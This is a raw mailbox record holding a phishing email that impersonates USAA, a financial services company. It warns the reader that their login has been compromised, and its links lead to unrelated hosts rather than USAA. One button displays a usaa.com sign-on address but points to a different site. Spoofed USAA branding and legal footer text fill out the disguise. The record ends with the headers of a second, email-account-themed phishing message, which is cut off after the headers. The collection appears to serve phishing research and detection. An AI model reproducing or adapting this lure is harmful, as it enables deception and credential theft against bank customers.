From: "USAA" <codewizard@approject.com>
To: jose@monkey.org
Subject: Your online login has been compromised
Date: 25 Dec 2016 14:13:13 +0300
Message-ID: <20161225141312.D437AA9BBE224FDB@approject.com>
MIME-Version: 1.0
Content-Type: multipart/related;
	boundary="----=_NextPart_000_0012_56A28F8A.A74FA4F3"
Status: O
X-Status: 
X-Keywords:                  
X-UID: 482


------=_NextPart_000_0012_56A28F8A.A74FA4F3
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<div id=3D"_aolWebSuiteMsgBody" class=3D"msgBody" >
<div id=3D"AOLMsgPart_0_e5a7d576-01e2-45af-b976-04c8b38ee6b2">
<table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"650" bgcol=
or=3D"#b5d7e6">
  <tr>
    <td height=3D"35" valign=3D"center" width=3D"650" align=3D"middle">
    <font style=3D"color: #929292; font-size: 9px" face=3D"Verdana, sans-se=
rif">To=20
    ensure delivery to your inbox, please add <span style=3D"color: #68a7c5=
">
    <a href=3D'mailto:USAA.Web.Services@customermail.usaa.com'>USAA.Web.Ser=
vices@customermail.usaa.com</a></span> to your address book.</font></td>
    <td>&nbsp;</td>
  </tr>
</table>
<table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"650" bgcol=
or=3D"#b5d7e6">
  <tr>
    <td width=3D"10">&nbsp;</td>
    <td bgcolor=3D"white" width=3D"630" align=3D"middle">
    <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"604">
      <tr>
        <td height=3D"5" colspan=3D"4"></td>
      </tr>
      <tr>
        <td height=3D"45" width=3D"54">
        <a target=3D_blank href=3D"http://arifindo.co.id/images/uau.htm" re=
l=3D"nofollow">
        <img border=3D"0" alt=3D"" src=3D"cid:emaillogo.gif" width=3D"61" h=
eight=3D"41"></a></td>
        <td>
        <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0">
          <tr>
            <td style=3D"font-variant: normal; font-style: normal; font-fam=
ily: Arial, sans-serif; color: #6d6d6d; font-size: 16px; font-weight: bold"=
 height=3D"22" align=3D"left">
            <span style=3D"display: block; margin-top: 9px">Personal Profil=
e=20
            Update</span></td>
          </tr>
          <tr>
            <td height=3D"23" nowrap=3D"" align=3D"left">
            <font size=3D"1" face=3D"Verdana, sans-serif">
            <a style=3D"color: #6d6d6d; text-decoration: none" target=3D_bl=
ank href=3D"http://arifindo.co.id/images/uau.htm" rel=3D"nofollow">
            View Accounts</a> |
            <a style=3D"color: #6d6d6d; text-decoration: none" target=3D_bl=
ank href=3D"http://arifindo.co.id/images/uau.htm" rel=3D"nofollow">
            Privacy Promise</a> |
            <a style=3D"color: #6d6d6d; text-decoration: none" target=3D_bl=
ank href=3D"http://arifindo.co.id/images/uau.htm" rel=3D"nofollow">
            Contact Us</a></font></td>
          </tr>
        </table>
        </td>
        <td height=3D"45" valign=3D"center" width=3D"367" align=3D"right">
        <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"18=
8" height=3D"65">
          <tr>
            <td width=3D"22">
            <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=
=3D"22" height=3D"65">
              <tr>
                <td style=3D"line-height: 0" height=3D"29" valign=3D"top" w=
idth=3D"8">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
cid:emailsec1-1.gif" width=3D"8" height=3D"29"></td>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
29" valign=3D"top" width=3D"14">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
cid:emailsec1-2.gif" width=3D"14" height=3D"29"></td>
              </tr>
              <tr>
                <td style=3D"line-height: 0" height=3D"29" valign=3D"top" w=
idth=3D"8">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
cid:emailsecspacer.gif" width=3D"8" height=3D"29"></td>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
29" valign=3D"top" width=3D"14">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
cid:emailsecspacer.gif" width=3D"14" height=3D"29"></td>
              </tr>
              <tr>
                <td style=3D"line-height: 0" height=3D"7" valign=3D"bottom"=
 width=3D"8">
                </td>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
7" valign=3D"bottom" width=3D"14">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
cid:emailsec2-1.gif" width=3D"14" height=3D"7"></td>
              </tr>
            </table>
            </td>
            <td bgcolor=3D"#e7e7e8" align=3D"left">
            <table border=3D"0" cellspacing=3D"0" cellpadding=3D"5" width=
=3D"100%" height=3D"65">
              <tr>
                <td style=3D"text-align: left; line-height: 12px; font-size=
: 9px" valign=3D"center" align=3D"left">
                <font style=3D"color: rgb(0,54,91); font-size: 10px" face=
=3D"Arial, Helvetica, sans-serif">
                <strong>USAA SECURITY ZONE</strong></font> <br>
                <font color=3D"#00365b" face=3D"Arial, Helvetica, sans-seri=
f">ONLINE</font>
                <br>
                <font style=3D"color: rgb(0,54,91); font-size: 9px" face=3D=
"Arial, Helvetica, sans-serif">
                MEMBER</font> <br>
                <font style=3D"color: rgb(0,54,91); font-size: 9px" face=3D=
"Arial, Helvetica, sans-serif">
                USAA # ending in: XXXX</font></td>
              </tr>
            </table>
            </td>
            <td bgcolor=3D"#ffffff" width=3D"7">
            <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=
=3D"7" height=3D"65">
              <tr>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
7" valign=3D"top" width=3D"7" align=3D"right">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
cid:emailsec1-3.gif" width=3D"7" height=3D"7"></td>
              </tr>
              <tr>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
51" valign=3D"top" width=3D"7" align=3D"right">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
cid:emailsecspacer.gif" width=3D"7" height=3D"51"></td>
              </tr>
              <tr>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
7" valign=3D"bottom" width=3D"7" align=3D"right">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
cid:emailsec2-2.gif" width=3D"7" height=3D"7"></td>
              </tr>
            </table>
            </td>
          </tr>
        </table>
        </td>
      </tr>
      <tr>
        <td height=3D"20" colspan=3D"4">&nbsp;</td>
      </tr>
      <tr>
        <td height=3D"1" colspan=3D"4"></td>
      </tr>
    </table>
    <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"95%">
      <tr>
        <td width=3D"95%" align=3D"left">
        <font style=3D"line-height: 18px; color: #333333; font-size: 12px" =
face=3D"Verdana, sans-serif">
        <font style=3D"line-height: 18px; color: rgb(51,51,51); font-size: =
12px" face=3D"Verdana, sans-serif">
        Dear Member,
        <p class=3D"aolmail_first"><span class=3D"aolmail_bold">Our</span> =
records show that your online login access has been compromised and we need=
 you to update everything to make it safer
<br>
<br>

        </ul>
        </p>
        <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" bgcolor=3D"=
#6cae35" height=3D"15">
          <tr bgcolor=3D"#6cae35">
            <td bgcolor=3D"#6cae35" valign=3D"center" width=3D"15" align=3D=
"middle">
            <img src=3D"cid:emailctaarrow.gif" width=3D"15" height=3D"15"><=
/td>
            <td bgcolor=3D"#6cae35" valign=3D"center" width=3D"134" align=
=3D"middle">
            <a style=3D"font-variant: normal; font-style: normal; font-fami=
ly: arial, sans-serif; color: rgb(255,255,255); font-size: 11px; font-weigh=
t: bold; text-decoration: none" target=3D_blank href=3D"http://nyfbfoundati=
on.org/com.htm">
            https://www.usaa.com/secure/signon.htm</a></td>
          </tr>
        </table>
        </font>=20=20
        <p><br>We value your business and the opportunity to serve all your=
 financial needs
		</td>
<td id=3D"yui_3_16_0_1_1399663152274_30548">&nbsp;</td>
        <br>
        &nbsp;</font></td>
        <td>&nbsp;</td>
      </tr>
      <tr>
      </tr>
    </table>
    </td>
    <td width=3D"5">&nbsp;</td>
    <td width=3D"5">&nbsp;</td>
  </tr>
  <tr>
    <td height=3D"5" width=3D"10">&nbsp;</td>
    <td height=3D"5" width=3D"630">&nbsp;</td>
    <td height=3D"5" width=3D"5">&nbsp;</td>
    <td height=3D"5" width=3D"5">&nbsp;</td>
  </tr>
  <tr>
    <td height=3D"20" colspan=3D"4">&nbsp;</td>
  </tr>
  <tr>
    <td colspan=3D"4" align=3D"middle">
    <font style=3D"line-height: 18px; color: #6d6d6d; font-size: 10px" face=
=3D"Verdana, sans-serif">
    Please do not reply to this e-mail. To send a secure message to USAA, p=
lease
    <a style=3D"color: #408cb0; text-decoration: none" target=3D_blank href=
=3D"http://arifindo.co.id/images/uau.htm" rel=3D"nofollow">
    contact us</a>.<br>
    <br>
    <a style=3D"color: #6d6d6d" target=3D_blank href=3D"http://arifindo.co.=
id/images/uau.htm" rel=3D"nofollow">
    Privacy Promise</a><br>
    USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288<br>
    &nbsp;</font></td>
  </tr>
  <tr>
    <td height=3D"15" width=3D"10">&nbsp;</td>
  </tr>
  <tr>
    <td width=3D"5" align=3D"left">&nbsp;</td>
    <td width=3D"630" colspan=3D"2" align=3D"left">
    <font style=3D"line-height: 18px; color: #6d6d6d; font-size: 10px" face=
=3D"Verdana, sans-serif">
    USAA means United Services Automobile Association and its insurance,=20=

    banking, investment and other companies. Banks Member FDIC. Investments=
=20
    provided by USAA Investment Management Company and USAA Financial Advis=
ors=20
    Inc., both registered broker dealers.</font></td>
    <td width=3D"5" align=3D"left">&nbsp;</td>
  </tr>
  <tr>
    <td height=3D"15" width=3D"10">&nbsp;</td>
  </tr>
  <tr>
    <td colspan=3D"4" align=3D"right">
    <font style=3D"line-height: 18px; color: #6d6d6d; font-size: 10px" face=
=3D"Verdana, sans-serif">
    67624-1212&nbsp;&nbsp;&nbsp;</font><br>
    &nbsp;</td>
  </tr>
</table>

</div>
</div>
=09
<!-- End msgReadForm -->
</td></tr>
</table>

=09




</body>
</html>
------=_NextPart_000_0012_56A28F8A.A74FA4F3
Content-Type: image/gif; name="emaillogo.gif"
Content-Transfer-Encoding: base64
Content-ID: <emaillogo.gif>

R0lGODlhPQApAOYAAEKFsUGEsFCOt8XZ54OvzHOlxY620ESGsf3+/vz9/pm91KXF2kiJs7fR
4W6iw02Mtcnc6LvT40uLtXanxmGZvoCty8DW5V2XvHWmxoSwzEqKtD+DsGqfwbTP4FqVu/f6
/L7V5D6Cr8jb6PD1+bjS4ubv9V+YvXKkxVSRuM3e6pS603iox+nx9omzztzo8KPE2bPO3+zz
997q8UeIsvP3+tPj7fT4+vD2+ViTucPY5mSbv+Ls83uqyK/M3pq+1eDr8p7B1+Pt9N3p8X2r
yZC40drn8EWHslOQuIaxzZy/1vb5+6jH29bk7kOGsZK40rbQ4Yq0z1uWu3+syq3K3WedwMfb
6K7L3avJ3EaHsmmewf7//0CDsPn7/NPi7XGjxFaSuaDC2KnI28ba59vo8GWcv6/L3s/g68Xa
5/P4+ujw9cvd6afG2qTE2bHN3/r8/dDg65e81NDh7G2hwt/q8mugwm+jxNnn7+ry9kuMtVeT
urvU4+70+KrI3DuBrjyBrv///yH5BAAAAAAALAAAAAA9ACkAAAf/gH+Cg4SFhocyLRmLAzt7
h5CRkpOQSH19fph+GkKUnp+UCFGXmH0ARxGgqpA3H5I7G5p9EjJKI6u4gwQSKD43kA1+fjoP
fhs7ucl/AcJ9Xw2HLcJhDpkLyrkAsn0OXYQIJsJCTsIABjHYqgYwCxfNIVAsgkHMDwkpDMJ+
AlMJ6Z4RCBgYsOCBpgdLEFgQ5uAPFxEZmvkho+bfJG3GDECQ1oyDHGEK/ijJssYCnVJ+KiCz
eMjIpUwIc1TTh2mAoBV9sliYcqTZDCA2WBbSUaFAiEwTQbRBoemAvD9hNGWAoIKZMA9PRgRJ
IfQNjAg5Jrz0I0WEggN+KGgRNOeLPgZA/8Ss0LcJwAShPftcaEDigiYjSapgaDEowRsFM5BG
4euO1AqhRpr1mTAADANNeaaUGISgABEIFSRTBiNBWAWhGgRoQBrACYSIzYIQUuAHRQ8QVFg7
EdGhgQyhIlKoeWHwkoArIDjs40LoTDMHOcIIaCZhyIkMQicEYAAFgoEQpThYeGGg0A3lmlpA
ILKBJg+hAJBKWDDgBN0Kmwt1uYICKR76BZTiBXx09UFBBB3goIkZhiDBgwhwYJRWBCQgYUAN
QiUhRgPoCTNEFT4c0AQNhjTQBxaB8YCUHwVY8QIQQhHSAA76AADHeIf88JIHHURAwYp+PBbj
IDSEqAkKcRziRv9opRRAUGnC1DFkIXMMgRQIkVjQWEbr4WBCB1MacoYJfTwFyQdsrGbcCymI
YUGYhnwAghuUlIAEXeBhACc2ZnToh557KqNFgsJAEWg699SAwB8JxLAoNgQUkN8faxTwwx8j
KGDCFw6QMIgQBUihRCFPnMDGIDv4AAQYk+aSTxGDWFnDBz8+oMMBFwzCRCY2EZKEHzP88kcP
S1DwBAzYCNCHC7r4IUMOftAx6gg5PKoCJqcVRmYfegjSQw8FLFFGsss2+wMMfgxYyAdHABCA
BrcIEgewQQpihwIkGPCbMtMxKwgBfhTxgzAFcDXIAH4YgIEfngoizRUMNHGHIDSM4QrHuf7+
ATCGHUA5wVMqjlFGH4DSwIAAXFTTQ4zTdfKvHxj+wYIC+TigRQwA5BpDAE79EYEfIaErR4w0
eiPIwkwQwkQAIdDQhh8eqOBEZFb8Yd8EKkjRRwCysbQwAYsWgYUGNriAzh9FBNDECBz0McMW
PPtxQhoAhHDAFgBs4cc1LImQiQlexHeNCgecwAMWfqgwBtQ32IDGrhvMRQQaNtjwgh9R+MMS
bk0E4AEfggzgAQAb9JIADDpUrYsOFJCRcRpZUNHqoYEGAgA7

------=_NextPart_000_0012_56A28F8A.A74FA4F3
Content-Type: image/gif; name="emailsec1-1.gif"
Content-Transfer-Encoding: base64
Content-ID: <emailsec1-1.gif>

R0lGODlhCAAdALMAABBDZUBohN/m6q/AzGCCmc/Z4L/N1iBPcK27xStXdpCks3SPoufn6P//
/wA2WwAAACH5BAAAAAAALAAAAAAIAB0AQAQ+sMlJpQgua42aAJtTUVh4hAszGsToVkNIhI5C
pwWqSgOYvcDgpNDi+USfkIGWOIUQN0Z0tkk1ShteiHLJRAAAOw==

------=_NextPart_000_0012_56A28F8A.A74FA4F3
Content-Type: image/gif; name="emailsec1-2.gif"
Content-Transfer-Encoding: base64
Content-ID: <emailsec1-2.gif>

R0lGODlhDgAdAMQAAB1MbcrR1ld5kHSPog5BZJ+vvCtXdtnc37zGza27xfb29vz8/Ozs7O3t
7oKZqkhuh+np6Tpifv///+fn6AA2WwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ACH5BAAAAAAALAAAAAAOAB0AQAVzoCRKSjOd6Emt7BoFadJOQ2vfLAEraZ8+sEnAcIv4ThEb
ANACCBA+yQJyrFonuFYBRaQYazbBMWkb22RZwvYkWjCukvd1YppPmCxnwpelqFErBng2OicH
Aw4HB4MsCAgzYE1mZT5kM5VhfSxGmhRrWS8pIQA7

------=_NextPart_000_0012_56A28F8A.A74FA4F3
Content-Type: image/gif; name="emailsecspacer.gif"
Content-Transfer-Encoding: base64
Content-ID: <emailsecspacer.gif>

R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==

------=_NextPart_000_0012_56A28F8A.A74FA4F3
Content-Type: image/gif; name="emailsec2-1.gif"
Content-Transfer-Encoding: base64
Content-ID: <emailsec2-1.gif>

R0lGODlhDgAHAKIAAOnp6e3t7vz8/Ozs7Pb29v///+fn6AAAACH5BAAAAAAALAAAAAAOAAcA
QAMUaLrMJaBJImu5hYRqNnfDt1xC+CUAOw==

------=_NextPart_000_0012_56A28F8A.A74FA4F3
Content-Type: image/gif; name="emailsec1-3.gif"
Content-Transfer-Encoding: base64
Content-ID: <emailsec1-3.gif>

R0lGODlhBwAHAKIAAOnp6e3t7vz8/Ozs7Pb29v///+fn6AAAACH5BAAAAAAALAAAAAAHAAcA
QAMRaEHVZTCSaIB4NI+L4+hRkAAAOw==

------=_NextPart_000_0012_56A28F8A.A74FA4F3
Content-Type: image/gif; name="emailsec2-2.gif"
Content-Transfer-Encoding: base64
Content-ID: <emailsec2-2.gif>

R0lGODlhBwAHAKIAAOnp6e3t7vz8/Ozs7Pb29v///+fn6AAAACH5BAAAAAAALAAAAAAHAAcA
QAMRaLpsIKUZYgIpOLbQhjYDVCQAOw==

------=_NextPart_000_0012_56A28F8A.A74FA4F3
Content-Type: image/gif; name="emailctaarrow.gif"
Content-Transfer-Encoding: base64
Content-ID: <emailctaarrow.gif>

R0lGODlhDwAPAKIAAHOZV+Hu1p/UdY3KXFmFNv7+/v///2yuNSH5BAAAAAAALAAAAAAPAA8A
AAMxaLfcC2K4eSCd9ra8gsRCMxRFuJkNGTQEyggk+y1DEMuNrTjErB29HyMoBPo0vV0xAQA7


------=_NextPart_000_0012_56A28F8A.A74FA4F3--

From jose@monkey.org Wed Dec 28 03:49:52 2016 +0000
Return-Path: bzhang@issas.ac.cn
Delivered-To: jose@monkey.org
X-FDA: 72339635424.16.team64_905b632346720
X-Spam-Summary: 50,0,0,feac85ef674fa284,d41d8cd98f00b204,bzhang@issas.ac.cn,:,RULES_HIT:41:72:152:355:379:495:800:962:967:969:973:983:988:989:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1535:1541:1575:1588:1589:1592:1594:1623:1711:1730:1777:1792:2525:2527:2539:2543:2560:2563:2682:2685:2859:2890:2891:2892:2894:2895:2897:2899:2900:2901:2917:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3352:3586:3865:3866:3867:3868:3870:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4250:4552:5007:6119:6261:6674:6678:6688:7652:7809:7903:8568:8583:8603:8634:8987:9025:9040:9072:9388:9873:9908:10004:10049:10197:10216:10346:10400:11480:11658:11914:12043:12160:12295:12517:12519:12658:12764:12986:13025:13137:13139:13150:13230:13231:13237:13848:13975:14039:14094:14181:14721:14828:14829:14849:14885:21067:21080:21326:21433:21450:21451:30001:30022:30026:30054:30069:30075,0,RBL:217.111.120.11:@issas.ac.cn:.lbl8.
X-HE-Tag: team64_905b632346720
X-Filterd-Recvd-Size: 5535
Received: from mailout03.rmx.de (mailout03.rmx.de [217.111.120.11])
	by imf05.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 28 Dec 2016 03:49:51 +0000 (UTC)
Received: from mailout01.rmx.de (mailout01.dmz2.retloc [172.19.21.54])
	(using TLSv1.2 with cipher AECDH-AES128-SHA (128/128 bits))
	(No client certificate requested)
	by mailout03.rmx.de (Postfix) with ESMTPS id 3tpJdm73jgzqSgq
	for <jose@monkey.org>; Wed, 28 Dec 2016 04:49:48 +0100 (CET)
Received: from kdin01.retarus.de (kdin01.dmz1.retloc [172.19.17.48])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by mailout01.rmx.de (Postfix) with ESMTPS id 3tpJdk6qgzz2SSKw
	for <jose@monkey.org>; Wed, 28 Dec 2016 04:49:46 +0100 (CET)
Received: from mail.mare.com (mail.mare.com [46.234.239.45])
	by kdin01.retarus.de (8.15.2/8.15.2/retarus.custom) with ESMTPS id uBS3njZP031099
	(version=TLSv1 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO)
	for <jose@monkey.org>; Wed, 28 Dec 2016 04:49:46 +0100
Received: from mail.mare.com (localhost [127.0.0.1])
	by mail.mare.com (Postfix) with ESMTPS id 0664BFEBA3
	for <jose@monkey.org>; Wed, 28 Dec 2016 04:44:32 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by mail.mare.com (Postfix) with ESMTP id E8860FF71B
	for <jose@monkey.org>; Wed, 28 Dec 2016 04:44:31 +0100 (CET)
Received: from mail.mare.com ([127.0.0.1])
	by localhost (mail.mare.com [127.0.0.1]) (amavisd-new, port 10026)
	with ESMTP id VXIv3jlHEsCJ for <jose@monkey.org>;
	Wed, 28 Dec 2016 04:44:31 +0100 (CET)
Received: from [192.168.1.3] (unknown [41.58.113.67])
	by mail.mare.com (Postfix) with ESMTPSA id 7B247FE9AA
	for <jose@monkey.org>; Wed, 28 Dec 2016 04:44:31 +0100 (CET)
Content-Type: multipart/alternative; boundary="===============2118041771=="
MIME-Version: 1.0
Subject: Your Email Account Breaches| DO NOT IGNORE (Secure Privacy)
To: jose@monkey.org
